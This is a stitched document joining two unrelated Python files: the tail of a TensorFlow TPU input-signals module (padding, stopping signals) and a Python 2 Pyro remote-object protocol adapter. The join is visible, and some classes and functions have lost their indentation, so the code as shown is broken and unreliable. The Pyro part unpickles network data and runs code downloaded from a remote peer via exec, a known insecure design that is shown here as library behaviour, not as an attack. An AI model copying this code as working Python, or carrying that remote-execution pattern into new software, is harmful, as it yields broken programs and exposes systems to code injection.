    is a dictionary now and `features`, `labels`, and `signals` are three
    distinguished keys in that dict. This provides a better structure, which
    eases the process to decompose the inputs (see `features_and_labels`).

    Args:
      stop: bool, state of current stopping signals.
      batch_size: int, batch size.
      add_padding: bool, whether to pad the tensor to full batch size.

    Returns:
      A map_fn passed to dataset.map API.
    """

    def _map_fn(*args):
      """The map fn to insert signals."""
      if len(args) == 1:
        # Unpack the single Tensor/dict argument as features. This is required
        # for the input_fn returns no labels.
        args = args[0]
      features, labels = _Inputs._parse_inputs(args)

      if add_padding:
        padding_mask, features, labels = (
            _PaddingSignals.pad_features_and_labels(
                features, labels, batch_size))
      else:
        padding_mask = None

      new_input_dict = {'features': features}
      if labels is not None:
        new_input_dict['labels'] = labels
      new_input_dict['signals'] = _StopSignals(
          stop=stop, batch_size=batch_size, padding_mask=padding_mask).as_dict()

      return new_input_dict

    return _map_fn
class _StopSignals(object):
  """Signals class holding all logic to handle TPU stopping condition."""

  NON_STOPPING_SIGNAL = False
  STOPPING_SIGNAL = True

  def __init__(self, stop, batch_size, padding_mask=None):
    self._stop = stop
    self._batch_size = batch_size
    self._padding_mask = padding_mask

  def as_dict(self):
    """Returns the signals as Python dict."""
    # A [batch_size, 1] bool tensor: all ones when stopping, else all zeros.
    shape = [self._batch_size, 1]
    make_tensor = array_ops.ones if self._stop else array_ops.zeros
    signals = {'stopping': make_tensor(shape=shape, dtype=dtypes.bool)}
    if self._padding_mask is not None:
      signals['padding_mask'] = self._padding_mask
    return signals

  @staticmethod
  def as_scalar_stopping_signal(signals):
    """Collapses the per-batch stopping tensor into a single scalar."""
    return array_ops.identity(signals['stopping'][0][0])

  @staticmethod
  def should_stop(scalar_stopping_signal):
    """Evaluates the stopping signal, in-graph or as plain Python."""
    if isinstance(scalar_stopping_signal, ops.Tensor):
      # STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
      # way to express the bool check whether scalar_stopping_signal is True.
      return math_ops.logical_and(
          scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL)
    # For non Tensor case, it is used in SessionRunHook. So, we cannot modify
    # the graph anymore. Here, we use pure Python.
    return bool(scalar_stopping_signal)
class _PaddingSignals(object):
  """Signals class holding all logic to handle padding."""

  @staticmethod
  def pad_features_and_labels(features, labels, batch_size):
    """Pads out the batch dimension of features and labels."""
    # Use any Tensor inside `features` to discover the dynamic batch size.
    real_batch_size = array_ops.shape(
        _PaddingSignals._find_any_tensor(features))[0]

    batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)

    check_greater = check_ops.assert_greater_equal(
        batch_size_tensor, real_batch_size,
        data=(batch_size_tensor, real_batch_size),
        message='The real batch size should not be greater than batch_size.')

    with ops.control_dependencies([check_greater]):
      missing_count = batch_size_tensor - real_batch_size

    def pad_single_tensor(tensor):
      """Pads out the batch dimension of a tensor to the complete batch_size."""
      rank = len(tensor.shape)
      assert rank > 0
      # Pad only along axis 0 (the batch dimension); other dims unchanged.
      padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
      padded_shape = (batch_size,) + tuple(tensor.shape[1:])
      padded_tensor = array_ops.pad(tensor, padding)
      padded_tensor.set_shape(padded_shape)
      return padded_tensor

    def nest_pad(tensor_or_dict):
      # Apply the padding to every Tensor in a (possibly nested) structure.
      return nest.map_structure(pad_single_tensor, tensor_or_dict)

    features = nest_pad(features)
    if labels is not None:
      labels = nest_pad(labels)

    padding_mask = _PaddingSignals._padding_mask(
        real_batch_size, missing_count, batch_size)

    return padding_mask, features, labels

  @staticmethod
  def slice_tensor_or_dict(tensor_or_dict, signals):
    """Slice the real Tensors according to padding mask in signals."""

    padding_mask = signals['padding_mask']
    batch_size = array_ops.shape(padding_mask)[0]

    def verify_batch_size(tensor):
      # Assert (via control dependency) that the tensor still carries the
      # full padded batch before passing it through.
      check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
      with ops.control_dependencies([check_batch_size]):
        return array_ops.identity(tensor)

    def slice_single_tensor(tensor):
      rank = len(tensor.shape)
      assert rank > 0
      real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
      return verify_batch_size(tensor)[0:real_batch_size]

    # As we split the Tensors to all TPU cores and concat them back, it is
    # important to ensure the real data is placed before padded ones, i.e.,
    # order is preserved. By that, the sliced padding mask should have all 0's.
    # If this assertion failed, the slice logic here would not hold.
    sliced_padding_mask = slice_single_tensor(padding_mask)
    assert_padding_mask = math_ops.equal(
        math_ops.reduce_sum(sliced_padding_mask), 0)

    with ops.control_dependencies([assert_padding_mask]):
      should_stop = _StopSignals.should_stop(
          _StopSignals.as_scalar_stopping_signal(signals))

    is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)

    def slice_fn(tensor):
      # If the current batch is full batch or part of stopping signals, we do
      # not need to slice to save performance.
      return control_flow_ops.cond(
          math_ops.logical_or(should_stop, is_full_batch),
          (lambda: verify_batch_size(tensor)),
          (lambda: slice_single_tensor(tensor)))

    return nest.map_structure(slice_fn, tensor_or_dict)

  @staticmethod
  def _find_any_tensor(batch_features):
    # Return the first Tensor found anywhere in the features structure.
    tensors = [x for x in nest.flatten(batch_features)
               if isinstance(x, ops.Tensor)]
    if not tensors:
      raise ValueError('Cannot find any Tensor in features dict.')
    return tensors[0]

  @staticmethod
  def _padding_mask(real_batch_size, missing_count, batch_size):
    # 0 marks a real row, 1 marks a padded row; length is the full batch.
    padding_mask = array_ops.concat(
        [
            array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
            array_ops.ones((missing_count,), dtype=dtypes.int32)
        ],
        axis=0)
    padding_mask.set_shape((batch_size,))
    return padding_mask
class _SignalsHelper(object):
"""A general helper class to handle common signals manipulation."""
def __init__(self, signals):
self._signal_keys = []
for key in sorted(signals.iterkeys()):
self._signal_keys.append(key)
@property
def num_signals(self):
return len(self._signal_keys)
def unflatten(self, tensor_list):
return dict(zip(self._signal_keys, tensor_list))
@staticmethod
def as_tensor_list(signals):
return [signals[key] for key in sorted(signals.iterkeys())]
def _verify_cross_hosts_transfer_size(tensor_dict, message):
  """Raises if the estimated byte size of `tensor_dict` exceeds the limit.

  Args:
    tensor_dict: dict of name -> Tensor; each value must expose `.shape`
      and `.dtype.size`.
    message: str, prefix for the raised error message.

  Raises:
    ValueError: if the total estimated size reaches _ONE_GIGABYTE, the
      protobuf transfer limit.
  """
  total_size = 0
  tensor_structure = {}
  for key, tensor in tensor_dict.items():
    shape = tensor.shape
    # np.product is deprecated (removed in NumPy 2.0); np.prod is the
    # supported equivalent.
    size = np.prod(shape) * tensor.dtype.size
    tensor_structure[key] = shape
    total_size += size
  if total_size >= _ONE_GIGABYTE:
    raise ValueError(
        '{} The transfer size is larger than the protobuf limit. Please '
        'consider to use Tensors with smaller shapes or reduce batch '
        'size. Given:\n'
        '{}'.format(message, '\n'.join([
            ' -- Key: {}, Shape: {}'.format(k, v)
            for k, v in tensor_structure.items()])))
|
protocol.py | #############################################################################
#
# $Id: protocol.py,v 2.94 2007/03/04 01:45:49 irmen Exp $
# Pyro Protocol Adapters
#
# This is part of "Pyro" - Python Remote Objects
# which is (c) Irmen de Jong - irmen@users.sourceforge.net
#
#############################################################################
import socket, struct, os, time, sys, md5, hmac, types, random
import imp, marshal, new, __builtin__
import Pyro
import util, constants
if os.name!='java': # Jython has no select module
import select, errno
from errors import *
from errors import _InternalNoModuleError
pickle = util.getPickle()
Log = util.Log
if util.supports_multithreading():
from threading import Thread,currentThread
_has_threading = 1
else:
_has_threading = 0
if util.supports_compression():
import zlib
_has_compression = 1
else:
_has_compression = 0
#------ Get the hostname (possibly of other machines) (returns None on error)
def getHostname(ip=None):
    """Return the hostname of `ip` (or of the local machine); None on error."""
    try:
        if not ip:
            return socket.gethostname()
        # Reverse-resolve the given address; only the primary name is used.
        hostname, _aliases, _addresses = socket.gethostbyaddr(ip)
        return hostname
    except socket.error:
        return None
#------ Get IP address (return None on error)
def getIPAddress(host=None):
    """Return the IP address of `host` (default: local hostname); None on error."""
    try:
        target = host or getHostname()
        return socket.gethostbyname(target)
    except socket.error:
        return None
#------ Socket helper functions for sending and receiving data correctly.
# process optional timeout on socket.
# XXX replace this with python's native socket timeouts. M2Crypto (SSL) needs special care...
def _sock_timeout_send(sock, timeout):
ssl_select_okay=not hasattr(sock,'pending') or sock.pending()==0
if timeout and ssl_select_okay:
r,w,e=safe_select([],[sock],[],timeout)
if not w:
raise TimeoutError('connection timeout sending')
def _sock_timeout_recv(sock, timeout):
ssl_select_okay=not hasattr(sock,'pending') or sock.pending()==0
if timeout and ssl_select_okay:
r,w,e=safe_select([sock],[],[],timeout)
if not r:
raise TimeoutError('connection timeout receiving')
# Receive a precise number of bytes from a socket. Raises the
# ConnectionClosedError if that number of bytes was not available.
# (the connection has probably been closed then).
# Never will this function return an empty message (if size>0).
# We need this because 'recv' isn't guaranteed to return all desired
# bytes in one call, for instance, when network load is high.
# Use a list of all chunks and join at the end: faster!
def sock_recvmsg(sock, size, timeout=0):
    """Receive exactly `size` bytes from `sock`.

    Raises ConnectionClosedError if that number of bytes was not available
    (the connection has probably been closed then). Never returns an empty
    message when size > 0.
    """
    if not hasattr(sock, 'pending'):
        # Plain (non-SSL) socket.
        try:
            return _recv_msg(sock, size, timeout)
        except socket.error:
            raise ConnectionClosedError('connection lost')

    # SSL socks have pending...
    # when using SSL, other exceptions occur.
    from M2Crypto.SSL import SSLError
    try:
        return _recv_msg(sock, size, timeout)
    except SSLError:
        raise ConnectionClosedError('connection lost')
# select the optimal recv() implementation
if hasattr(socket.socket, "recvall"): # Irmen's custom socket module extension, see Python patch #1103213
    # Fast path: the patched socket object can read an exact byte count itself.
    def _recv_msg(sock,size,timeout):
        _sock_timeout_recv(sock,timeout)
        chunk=sock.recvall(size)
        if len(chunk)!=size:
            err=ConnectionClosedError('connection lost')
            err.partialMsg=chunk  # store the message that was received until now
            raise err
        return chunk
elif hasattr(socket,"MSG_WAITALL") and not Pyro.config.PYRO_BROKEN_MSGWAITALL:
    # MSG_WAITALL asks the kernel to block until the full message arrived.
    def _recv_msg(sock,size,timeout):
        _sock_timeout_recv(sock,timeout)
        try:
            chunk=sock.recv(size, socket.MSG_WAITALL) # receive all data in one call
        except TypeError:
            # XXX This is caused by a bug in the M2Crypto API, it doesn't like the MSG_WAITALL parameter
            # Once the bug is fixed, the compat function can be rolled back into the _recv_msg below.
            return __recv_msg_compat(sock,size,timeout)
        else:
            if len(chunk)!=size:
                err=ConnectionClosedError('connection lost')
                err.partialMsg=chunk # store the message that was received until now
                raise err
            return chunk
else:
    # Fallback: loop over plain recv() calls until everything arrived.
    def _recv_msg(sock,size,timeout):
        _sock_timeout_recv(sock, timeout)
        return __recv_msg_compat(sock,size,timeout)
def __recv_msg_compat(sock, size, timeout):  # compatibility implementation for non-MSG_WAITALL / M2Crypto
    """Read exactly `size` bytes via repeated recv() calls, joining at the end."""
    received = 0
    chunks = []
    # Receive chunks of max. 60kb size:
    # (rather arbitrary limit, but it avoids memory/buffer problems on certain OSes -- VAX/VMS, Windows)
    while received < size:
        chunk = sock.recv(min(60000, size - received))
        if not chunk:
            err = ConnectionClosedError('connection lost')
            err.partialMsg = ''.join(chunks)  # store the message that was received until now
            raise err
        chunks.append(chunk)
        received += len(chunk)
    return ''.join(chunks)
# Send a message over a socket. Raises ConnectionClosedError if the msg
# couldn't be sent (the connection has probably been lost then).
# We need this because 'send' isn't guaranteed to send all desired
# bytes in one call, for instance, when network load is high.
def sock_sendmsg(sock, msg, timeout=0):
    """Send `msg` completely over `sock`.

    Raises ConnectionClosedError if the msg couldn't be sent (the connection
    has probably been lost then). Needed because a single send() isn't
    guaranteed to transmit all bytes, e.g. under high network load.
    """
    try:
        _sock_timeout_send(sock, timeout)
        sock.sendall(msg)
    except socket.error:
        raise ConnectionClosedError('connection lost')
# set socket option to try to re-use a server port if possible
def set_reuse_addr(sock):
    """Best effort: allow a server port to be re-bound quickly."""
    # only do this on a non-windows platform. Windows screws things up with REUSEADDR...
    if os.name in ('nt', 'dos', 'ce') or sys.platform == 'cygwin':
        return
    try:
        current = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, current | 1)
    except:
        # Deliberately ignore failures -- setting the option is optional.
        pass
# set socket option to enable timeout checking for server sockets.
def set_sock_keepalive(sock):
    """Enable TCP keepalive on sock so dead peers are eventually detected.

    Only attempted when PYRO_SOCK_KEEPALIVE is configured on. If the
    platform refuses the option, the global config flag is switched off so
    no further attempts are made on later sockets.
    """
    if Pyro.config.PYRO_SOCK_KEEPALIVE:
        try:
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
        except socket.error:
            # narrowed from a bare except: setsockopt failures are socket errors.
            # it didn't work -- disable keepalives for the rest of the run.
            Pyro.config.PYRO_SOCK_KEEPALIVE = 0
#------ PYRO: adapter (default Pyro wire protocol)
#------ This adapter is for protocol version 4 ONLY
# Future adapters could be downwards compatible and more flexible.
# Wire-protocol flag bits carried in the version-4 message header (bitmask).
PFLG_COMPRESSED = 0x01        # protocol flag: compressed body
PFLG_CHECKSUM = 0x02          # protocol flag: checksum body
PFLG_XMLPICKLE_GNOSIS = 0x04  # protocol flag: used xml pickling (Gnosis)

# Module-level locks serializing the mobile-code import machinery, which
# temporarily replaces __builtin__.__import__ and must not interleave.
_agentImportLock=util.getLockObject()
_remoteImportRLock=util.getRLockObject()
class PYROAdapter:
    """Pyro wire-protocol adapter, for protocol version 4 ONLY.

    Implements both the client side (bindToURI / remoteInvocation) and the
    server side (handleConnection / handleInvocation) of the PYRO protocol,
    including optional compression, checksums, XML pickling and mobile code.
    """
    headerFmt = '!4sHHlHl'   # version 4 header (id, ver, hsiz,bsiz,pflags,crc)
    headerID = 'PYRO'
    connectMSG='CONNECT'
    acceptMSG= 'GRANTED'
    denyMSG=   'DENIED'      # must be same length as acceptMSG,
                             # note that a 1-character code is appended!
    AUTH_CHALLENGE_SIZE = 16
    headerSize = struct.calcsize(headerFmt)
    version=4                # version 4 protocol

    def __init__(self):
        self.onewayMethods=[]    # methods that should be called one-way
        self.timeout=None        # socket timeout
        self.ident=''            # connection identification
        self.setNewConnectionValidator(DefaultConnValidator())

    def sendAccept(self, conn):      # called by TCPServer
        # tell the connecting client it has been granted access
        sock_sendmsg(conn.sock, self.acceptMSG, self.timeout)

    def sendDeny(self, conn, reasonCode=constants.DENIED_UNSPECIFIED):   # called by TCPServer
        # deny message carries a single-digit reason code appended to it
        sock_sendmsg(conn.sock, self.denyMSG+str(reasonCode)[0], self.timeout)

    def __del__(self):
        self.release(nolog=1)

    def recvAuthChallenge(self, conn):
        """Receive and return the server's authentication challenge bytes."""
        ver,body,pflags = self.receiveMsg(conn)
        if ver==self.version and len(body)==self.AUTH_CHALLENGE_SIZE:
            return body
        raise ValueError("Received version must be "+`self.version`+" and auth challenge must be exactly "+`self.AUTH_CHALLENGE_SIZE`+" bytes")

    def setNewConnectionValidator(self,validator):
        # validator must derive from DefaultConnValidator so server & client
        # agree on how auth tokens are created/checked
        if not isinstance(validator, DefaultConnValidator):
            raise TypeError("validator must be specialization of DefaultConnValidator")
        self.newConnValidator=validator

    def getNewConnectionValidator(self):
        return self.newConnValidator

    def bindToURI(self,URI):
        """Connect this adapter to the Pyro object referenced by URI (client side)."""
        # Client-side connection stuff. Use auth code from our own connValidator.
        if URI.protocol not in ('PYRO', 'PYROLOC'):
            Log.error('PYROAdapter','incompatible protocol in URI:',URI.protocol)
            raise ProtocolError('incompatible protocol in URI')
        try:
            self.URI=URI.clone()
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((URI.address, URI.port))
            conn=TCPConnection(sock,sock.getpeername())
            # receive the authentication challenge string, and use that to build the actual identification string.
            try:
                authChallenge=self.recvAuthChallenge(conn)
            except ProtocolError,x:
                # check if we were denied
                if hasattr(x,"partialMsg") and x.partialMsg[:len(self.denyMSG)]==self.denyMSG:
                    raise ConnectionDeniedError(constants.deniedReasons[int(x.partialMsg[-1])])
                else:
                    raise
            # reply with our ident token, generated from the ident passphrase and the challenge
            msg = self._sendConnect(sock,self.newConnValidator.createAuthToken(self.ident, authChallenge, conn.addr, self.URI, None) )
            if msg==self.acceptMSG:
                self.conn=conn
                self.conn.connected=1
                Log.msg('PYROAdapter','connected to',str(URI))
                if URI.protocol=='PYROLOC':
                    self.resolvePYROLOC_URI("PYRO")   # updates self.URI
            elif msg[:len(self.denyMSG)]==self.denyMSG:
                try:
                    raise ConnectionDeniedError(constants.deniedReasons[int(msg[-1])])
                except (KeyError,ValueError):
                    raise ConnectionDeniedError('invalid response')
        except socket.error:
            Log.msg('PYROAdapter','connection failed to URI',str(URI))
            raise ProtocolError('connection failed')

    def resolvePYROLOC_URI(self, newProtocol):
        # This method looks up the object URI referenced by
        # the PYROLOC string, and updates self.URI in place!
        objectName=self.URI.objectID
        Log.msg('PYROAdapter','resolving PYROLOC name: ',objectName)
        # call the special Resolve method on the daemon itself:
        self.URI.objectID=constants.INTERNAL_DAEMON_GUID
        result=self.remoteInvocation('ResolvePYROLOC',0,objectName)
        # found it, switching to regular pyro protocol
        self.URI.objectID=result
        self.URI.protocol=newProtocol

    def _sendConnect(self, sock, ident):
        # send CONNECT + auth token and read back the (fixed-size) verdict
        body=self.connectMSG+ident
        sock_sendmsg(sock, self.createMsg(body), self.timeout)
        return sock_recvmsg(sock, len(self.acceptMSG),self.timeout)

    def release(self,nolog=0):
        """Close and forget the current connection, if any."""
        if hasattr(self,'conn'):
            if not nolog:
                Log.msg('PYROAdapter','releasing connection')
            self.conn.close()
            del self.conn

    def connected(self):
        if hasattr(self,'conn'):
            return self.conn.connected
        return 0

    def rebindURI(self, tries=sys.maxint, wait=1):
        """Retry bindToURI up to `tries` times, sleeping `wait` secs between tries."""
        t=0
        while t<tries:
            try:
                self.bindToURI(self.URI)
                return
            except ProtocolError:
                t+=1
                if t<tries:
                    time.sleep(wait)
        raise TimeoutError('connection lost')

    def createMsg(self, body, replyflags=0):
        """Wrap body in a version-4 header, optionally compressing/checksumming it."""
        pflgs=replyflags
        if _has_compression and Pyro.config.PYRO_COMPRESSION:
            before=len(body)
            bz=zlib.compress(body)    # default compression level
            if len(bz)<before:
                # only use the compressed form when it actually got smaller
                pflgs|=PFLG_COMPRESSED
                body=bz
        crc=0
        if Pyro.config.PYRO_CHECKSUM and _has_compression:
            crc=zlib.adler32(body)
            pflgs|=PFLG_CHECKSUM
        if Pyro.config.PYRO_XML_PICKLE=='gnosis':
            pflgs|=PFLG_XMLPICKLE_GNOSIS
        return struct.pack(self.headerFmt, self.headerID, self.version, self.headerSize, len(body), pflgs, crc) + body

    def setOneway(self, methods):
        self.onewayMethods.extend(methods)

    def setTimeout(self, timeout):
        self.timeout=timeout

    def setIdentification(self, ident, munge=True):
        if ident:
            if munge:
                self.ident=self.newConnValidator.mungeIdent(ident)   # don't store ident itself.
            else:
                self.ident=ident   # pre-munged ident string
        else:
            self.ident=''

    def getIdentification(self):
        return self.ident

    # Retrieve code from the remote peer. Works recursively.
    def _retrieveCode(self, mname, level):
        # XXX this is nasty code, and also duplicated in core.py remote_supply_code()
        if mname in sys.modules:
            # module is already loaded, do nothing
            # XXX how can we be sure if the module is "complete"?
            # XXX because things might go wrong during the loading code below?
            return
        try:
            _remoteImportRLock.acquire()
            # Called by the client-side to obtain code from the server-side.
            # Call the special method on the server to retrieve the code.
            # No need for complex exception stuff like when the server needs
            # code from the client (see handleInvocation): because the server
            # is a Pyro object we can actually *call* it :-)
            module = self.remoteInvocation("remote_retrieve_code",0,mname)
            mname = mname.split('.')
            path = ''
            mod = new.module("pyro-server-context")
            for m in mname:
                path += '.' + m
                # use already loaded modules instead of overwriting them
                real_path = path[1:]
                if sys.modules.has_key(real_path):
                    mod = sys.modules[real_path]
                else:
                    setattr(mod, m, new.module(real_path))
                    mod = getattr(mod, m)
                    sys.modules[real_path] = mod
            # distinguish source from compiled bytecode by the magic cookie
            if module[0:4] != imp.get_magic():
                code = compile(module, "<downloaded>", "exec")
            else:
                code = marshal.loads(module[8:])
            importer=None
            try:
                loaded = 0
                # XXX probably want maxtries here...
                while not loaded:
                    # install a custom importer to intercept any extra needed modules
                    # when executing the module code just obtained from the server
                    _agentImportLock.acquire()
                    importer = agent_import(__builtin__.__import__)
                    __builtin__.__import__ = importer
                    _agentImportLock.release()
                    try:
                        exec code in mod.__dict__
                        loaded = 1
                    except ImportError:
                        mname = importer.name
                        if importer is not None:
                            __builtin__.__import__ = importer.orig_import
                            importer = None
                        # XXX probably want maxrecursion here...
                        self._retrieveCode(mname, level+1)
            finally:
                if importer is not None:
                    __builtin__.__import__ = importer.orig_import
        finally:
            _remoteImportRLock.release()

    def remoteInvocation(self, method, flags, *args):
        """Invoke `method(*args)` on the remote object and return its result.

        Rebinds automatically when the connection is gone, honours oneway
        methods, and (when mobile code is on) fetches/supplies missing
        modules from/to the server as needed.
        """
        if 'conn' not in self.__dict__.keys():
            Log.msg('PYROAdapter','no connection, trying to bind again')
            if 'URI' in self.__dict__.keys():
                self.bindToURI(self.URI)
            else:
                raise ProtocolError('trying to rebind, but was never bound before')
        if method in self.onewayMethods:
            flags |= constants.RIF_Oneway
        body=pickle.dumps((self.URI.objectID,method,flags,args),Pyro.config.PYRO_PICKLE_FORMAT)
        sock_sendmsg(self.conn.sock, self.createMsg(body), self.timeout)
        if flags & constants.RIF_Oneway:
            return None      # no answer required, return immediately
        ver,answer,pflags = self.receiveMsg(self.conn,1)
        if answer is None:
            raise ProtocolError('incorrect answer received')
        # Try to get the answer from the server.
        # If there are import problems, try to get those modules from
        # the server too (if mobile code is enabled).
        if not Pyro.config.PYRO_MOBILE_CODE:
            answer = pickle.loads(answer)
        else:
            importer=None
            try:
                _remoteImportRLock.acquire()
                loaded = 0
                # XXX maxtries here...
                while not loaded:
                    # install a custom importer to intercept any extra needed modules
                    # when unpickling the answer just obtained from the server
                    _agentImportLock.acquire()
                    importer = agent_import(__builtin__.__import__)
                    __builtin__.__import__ = importer
                    _agentImportLock.release()
                    try:
                        answer = pickle.loads(answer)
                        loaded = 1
                    except ImportError:
                        mname = importer.name
                        if importer is not None:
                            __builtin__.__import__ = importer.orig_import
                            importer = None
                        self._retrieveCode(mname, 0)
            finally:
                if importer is not None:
                    __builtin__.__import__ = importer.orig_import
                _remoteImportRLock.release()
        if isinstance(answer,PyroExceptionCapsule):
            if isinstance(answer.excObj,_InternalNoModuleError):
                # server couldn't load module, supply it
                # XXX this code is ugly. and duplicated in remote_retrieve_code in core.py
                try:
                    importmodule=new.module('-agent-import-')
                    mname=answer.excObj.modulename
                    # not used: fromlist=answer.excObj.fromlist
                    try:
                        exec 'import '+mname in importmodule.__dict__
                    except ImportError:
                        Log.error('PYROAdapter','Server wanted a non-existing module:',mname)
                        raise PyroError('Server wanted a non-existing module',mname)
                    m=eval('importmodule.'+mname)
                    bytecode=None
                    if hasattr(m,"_PYRO_bytecode"):
                        # use the bytecode that was put there earlier,
                        # this avoids recompiles of the source .py if we don't have .pyc bytecode available
                        bytecode=m._PYRO_bytecode
                    else:
                        # try to load the module's compiled source, or the real .py source if that fails.
                        # note that the source code (.py) is opened with universal newline mode
                        if not hasattr(m,"__file__"):
                            raise PyroError("cannot read module source code",mname)
                        (filebase,ext)=os.path.splitext(m.__file__)
                        if ext.startswith(".PY"):
                            exts = ( (".PYO","rb"), (".PYC","rb"), (".PY","rU") )   # uppercase
                        else:
                            exts = ( (".pyo","rb"), (".pyc","rb"), (".py","rU") )   # lowercase
                        for ext,mode in exts:
                            try:
                                bytecode=open(filebase+ext, mode).read()
                                break
                            except EnvironmentError:
                                pass
                    if bytecode:
                        self.remoteInvocation("remote_supply_code",0,mname, bytecode, self.conn.sock.getsockname())
                        # retry the method invocation
                        return self.remoteInvocation(* (method, flags)+args)
                    Log.error("PYROAdapter","cannot read module source code for module:", mname)
                    raise PyroError("cannot read module source code",mname)
                finally:
                    del importmodule
            else:
                # we have an encapsulated exception, raise it again.
                answer.raiseEx()
        return answer

    # (private) receives a socket message, returns: (protocolver, message, protocolflags)
    def receiveMsg(self,conn,noReply=0):
        """Read one framed message from conn; returns (ver, body, pflags).

        body is None when a protocol error was detected and (if possible)
        reported back to the peer. Handles checksum verification and
        decompression according to the header flags.
        """
        msg=sock_recvmsg(conn.sock, self.headerSize, self.timeout)
        (hid, ver, hsiz, bsiz, pflags, crc) = struct.unpack(self.headerFmt,msg)
        # store in the connection what pickle method this is
        if pflags&PFLG_XMLPICKLE_GNOSIS:
            conn.pflags|=PFLG_XMLPICKLE_GNOSIS
        if ver!=self.version:
            Log.error('PYROAdapter','incompatible protocol version')
            if noReply:
                raise ProtocolError('incompatible protocol version')
            else:
                # try to report error to client, but most likely the connection will terminate:
                self.returnException(conn, ProtocolError('incompatible protocol version'))
                return ver,None,pflags
        if hid!=self.headerID or hsiz!=self.headerSize:
            Log.error('PYROAdapter','invalid header')
            Log.error('PYROAdapter','INVALID HEADER DETAILS: ',conn,( hid, ver, hsiz, bsiz,pflags))
            # try to report error to client, but most likely the connection will terminate:
            self.returnException(conn, ProtocolError('invalid header'), shutdown=1)
            return ver,None,pflags
        body=sock_recvmsg(conn.sock, bsiz, self.timeout)
        if pflags&PFLG_CHECKSUM:
            if _has_compression:
                if crc!=zlib.adler32(body):
                    Log.error('PYROAdapter','checksum error in body')
                    self.returnException(conn, ProtocolError('checksum error'))
                    return ver,None,pflags
            else:
                raise ProtocolError('cannot perform checksum')
        if pflags&PFLG_COMPRESSED:
            if _has_compression:
                body=zlib.decompress(body)
            else:
                # We received a compressed message but cannot decompress.
                # Is this really a server error? We now throw an exception on the server...
                raise ProtocolError('compression not supported')
        return ver,body,pflags

    def _unpickleRequest(self, pflags, body):
        # pick the unpickler matching the flags the peer used
        if pflags&PFLG_XMLPICKLE_GNOSIS:
            if Pyro.config.PYRO_XML_PICKLE=='gnosis':
                return pickle.loads(body)
            else:
                return util.getXMLPickle('gnosis').loads(body)
        elif Pyro.config.PYRO_XML_PICKLE:
            Log.error('PYROAdapter','xml pickle required, got other pickle')
            raise ProtocolError('xml pickle required, got other pickle')
        else:
            return pickle.loads(body)

    def handleInvocation(self,daemon,conn):
        """Server side: read one request from conn and dispatch it."""
        ver,body,pflags = self.receiveMsg(conn)
        if not body:
            # something went wrong even before receiving the full message body
            return
        if ver!=self.version:
            Log.error('PYROAdapter','incompatible protocol version')
            self.returnException(conn, ProtocolError('incompatible protocol version'))
            return
        # Unpickle the request, which is a tuple:
        #   (object ID, method name, flags, (arg1,arg2,...))
        importer=fromlist=None
        try:
            try:
                # install a custom importer to intercept any extra needed modules
                # when unpickling the request just obtained from the client
                _agentImportLock.acquire()
                importer=agent_import(__builtin__.__import__)
                __builtin__.__import__=importer
                _agentImportLock.release()
                req=self._unpickleRequest(pflags, body)
                if type(req)!=type(()):
                    raise TypeError("REQUESTDATA ISN'T A TUPLE")
            finally:
                __builtin__.__import__=importer.orig_import
        except ImportError,x:
            if Pyro.config.PYRO_MOBILE_CODE:
                # return a special exception that will be processed by client;
                # it will call the internal 'remote_supply_code' member
                if importer:
                    modname=importer.name
                    fromlist=importer.fromlist
                else:
                    modname = x.args[0][16:]
                    fromlist=None
                self.returnException(conn, _InternalNoModuleError(modname,fromlist),0)   # don't shutdown!
            else:
                Log.error('PYROAdapter','code problem with incoming object: '+str(x))
                self.returnException(conn, NoModuleError(* x.args))
            return
        try:
            # find the object in the implementation database of our daemon
            o=daemon.implementations[req[0]]
        except (KeyError, TypeError) ,x:
            Log.warn('PYROAdapter','Invocation to unknown object ignored:',x)
            self.returnException(conn, ProtocolError('unknown object ID'))
            return
        else:
            # Do the invocation. We are already running in our own thread.
            if req[2]&constants.RIF_Oneway and daemon.threaded:    # flags
                # received a oneway call, run this in its own thread.
                thread=Thread(target=self._handleInvocation2, args=(daemon,req,pflags,conn,o))
                thread.setDaemon(1)   # thread must exit at program termination.
                thread.start()
            else:
                # not oneway or not in threaded mode, just do the invocation synchronously
                self._handleInvocation2(daemon,req,pflags,conn,o)

    def _handleInvocation2(self, daemon, req, pflags, conn, obj):
        """Perform the actual method call for a decoded request and reply."""
        try:
            flags=req[2]
            importer=None
            if not Pyro.config.PYRO_MOBILE_CODE:
                res = obj[0].Pyro_dyncall(req[1],flags,req[3])    # (method,flags,args)
            else:
                try:
                    # install a custom importer to intercept any extra needed modules
                    # when executing the remote method. (using the data passed in by
                    # the client may trigger additional imports)
                    _agentImportLock.acquire()
                    importer=agent_import(__builtin__.__import__)
                    __builtin__.__import__=importer
                    _agentImportLock.release()
                    res = obj[0].Pyro_dyncall(req[1],flags,req[3])    # (method,flags,args)
                finally:
                    __builtin__.__import__=importer.orig_import
            if flags&constants.RIF_Oneway:
                return    # no result, return immediately
            # reply the result to the caller, using the same pickle flavor it used
            if pflags&PFLG_XMLPICKLE_GNOSIS:
                replyflags=PFLG_XMLPICKLE_GNOSIS
                if Pyro.config.PYRO_XML_PICKLE=='gnosis':
                    body=pickle.dumps(res,Pyro.config.PYRO_PICKLE_FORMAT)
                else:
                    body=util.getXMLPickle('gnosis').dumps(res,Pyro.config.PYRO_PICKLE_FORMAT)
            else:
                replyflags=0
                body=pickle.dumps(res,Pyro.config.PYRO_PICKLE_FORMAT)
            sock_sendmsg(conn.sock, self.createMsg(body,replyflags),self.timeout)
        except ImportError,ix:
            if Pyro.config.PYRO_MOBILE_CODE:
                # Return a special exception that will be processed by client;
                # it will call the internal 'remote_supply_code' member.
                # We have to use this seemingly complex way to signal the client
                # to supply us some code, but it is only a proxy! We can't *call* it!
                if importer:
                    # grab the import info from our importer
                    name=importer.name
                    fromlist=importer.fromlist
                else:
